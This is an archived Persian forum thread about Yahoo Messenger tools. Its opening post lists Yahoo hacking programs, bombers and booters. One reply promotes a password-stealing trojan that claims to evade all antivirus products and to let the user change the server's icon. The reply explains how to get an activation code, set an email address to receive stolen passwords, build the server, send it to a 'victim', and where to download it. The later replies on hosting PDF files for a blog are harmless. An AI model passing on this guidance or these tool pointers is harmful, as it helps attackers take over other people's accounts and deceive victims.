سایت سبزدلان گزیر

نسخه کامل: تاپيك مخصوص برنامه هاي ياهو
شما در حال مشاهده نسخه تکمیل نشده می باشید. مشاهده نسخه کامل با قالب بندی مناسب.
سلام دوستان . اين تاپيك رو زدم مخصوص برنامه و آموزش هاي ياهو . هر سوالي كه در مورد ياهو و اينترنت داريد در اين تاپيك مطرح كنيد همچنين برنامه اي درخواستي خود را نيز در اين تاپيك مطرح كنيد .

برنامه هاي مربوط به اينترنت اكسپلورر
برنامه هاي هك ياهو
بوترها
بمبرها
ابزارهاي وي سي كشي
آيدي ساز ها
و .......

در اين تاپيك قرار ميگيرن

موفق باشيد .
از خدمات شما کمال تشکر را دارم لطفا خواهش می کنم که در ابتدا نرم افزاری جدید برای هک کردن در یاهو مسنجر برای ما معرفی کنید
آیا برای پیوست کردن مطالب در وبلاگ راه حلی وجود دارد
ویروس@ نوشته شده توسط:از خدمات شما کمال تشکر را دارم لطفا خواهش می کنم که در ابتدا نرم افزاری جدید برای هک کردن در یاهو مسنجر برای ما معرفی کنید

سلام دوست عزيز امروز يك برنامه ي جديد در زمينه ارسال پسورد بدستم رسيد كه براي اولين بار در بين تماتم سايتهاي ايراني در اين سايت قرار ميگيره .

اينم عكس برنامه :

[تصویر: 2k9eef644c73.jpg]

قابليت هاي برنامه :

ارسال پسورد تمام ورژن هاي ياهو از جمله ورژن 9
دور زدن تمام آنتي ويروسهاي دنيا از جمله پاندا . نورتون .مك كافي و ...
قابليت عوض كردن آيكن سرور ساخته شده توسط برنامه

( توجه كنيد براي استفاده كردن از اين برنامه لازم هست كه شما وارد سايت سازنده ي اين برنامه بشيد كه در آخر لينكش رو ميزارم و آيدي رو كه مايليد پسوردهاي هك شده رو دريافت كنه رو تو سايت ميديد و خود برنامه نويس كد فعال سازي رو به شما ميده و زماني كه كد فعال سازي به دستتون رسيد در سمت راست برنامه يعني جايي كه نوشته Set Ur Email وارد ميكنيد و يك بار برنامه رو ببنديد و وقتي دوباره برنامه رو باز ميكنيد ميبينيد كه ايميل مورد نظر شما در قسمت Your Email قرار گرفته و سپس سرور خودتون رو بسازيد و براي قرباني ارسال كنيد )

آدرس سايت :
www.Fun2net.com/forum
وارد اين سايت بشين و براي خودتون يك يوزر بسازيد .
اينم تاپيكي كه اين برنامه در اون قرار گرفته و شما ميتوانيد تقاضاي كد فعال سازي كنيد :
http://fun2net.com/forum/showthread.php?p=4108#post4108

اينم متن درخواست براي اون دسته از دوستاني كه مشكل دارن :

hi bro plz send me code

اينجا ايميل خودتون رو وارد كنيد

thnx in advance..Peace

و اما اسكن دقيق برنامه از نظر آلوده بودن :

[CENTER]nclick="self.parent.InsertSymbol('[تصویر: 2ke4d191824b.jpg]
[CENTER]
[CENTER]
[LEFT]توجه كنيد شما براي اجرا كردن برنامه نياز به Ri.ocx داريد كه با سرچ كردن تو گوگل به راحتي پيدا ميكنيد .
[LEFT]
[LEFT]لينك دانلود
[LEFT]
[LEFT]
[LEFT]اگر مشكلي در مورد اين برنامه داشتيد در همين تاپيك مطرح كنيد .
[LEFT]
[LEFT]موفق باشيد .
ویروس@ نوشته شده توسط:آیا برای پیوست کردن مطالب در وبلاگ راه حلی وجود دارد

دوست عزيز منظور شما رو متوجه نشدم اگه ميشه واضع تر و دقيق منظورتون رو بگيد ممنون ميشم .

موفق باشيد .
با تشکر از شما منظورم این بود که آیا مثلا می شود فایل پی دی اف را دروبلاگ گذاشت تا دیگران بتوانند آن را دانلود کنند

bocho gezir

سلام
بله می شود این کار را انجام داد به این صورت که فایل خود را در سایت دیگری که سرویس هاست می دهند آپلود کنید و بعد لینک بدین یعنی در وبلاگ شما اون لینک را بگذارید تا دوستان شما بوانند از وبلاگ شما دانلود کنن
حالا چه سایتهای سرویس هاست می دهند:
بعضی سایتها ایرانی و خارجی هستند که سرویس هاست می دهند ولی من به شما سایت پرسین گیگ پیشنهاد می کنم به خاطر اینکه هم ایرانی هست و هم اطمینان لازم را دارد یعنی یه موقع فایل شما پاک نمی شود اما سایت پرسین گیگ نمی توانید ثبت نام کنید یعنی ثبت نام آن محدود است حالا اگر شما می خواد یه هاست خصوصی در پرسین گیگ داشته باشید می تونید ایمیل خود را به پیام خصوصی من بفرستید تا من دعوتنامه پرسین گیگ را برای شما بفرستم پرسین گیگ فضای 100 مگا بایت مجانی به شما می دهد
ایمیل خود را بفرستید تا من دعوتنامه شما را ارسال کنم تا یک هاست خصوصی داشته باشید
امیدوارم خوب توضیح داده باشم
با تشکر

ویروس@ نوشته شده توسط:با تشکر از شما منظورم این بود که آیا مثلا می شود فایل پی دی اف را دروبلاگ گذاشت تا دیگران بتوانند آن را دانلود کنند

مهمان

لطفا روش ساخت يوزر(fun2net) دررا توضيح دهيد
لینک مرجع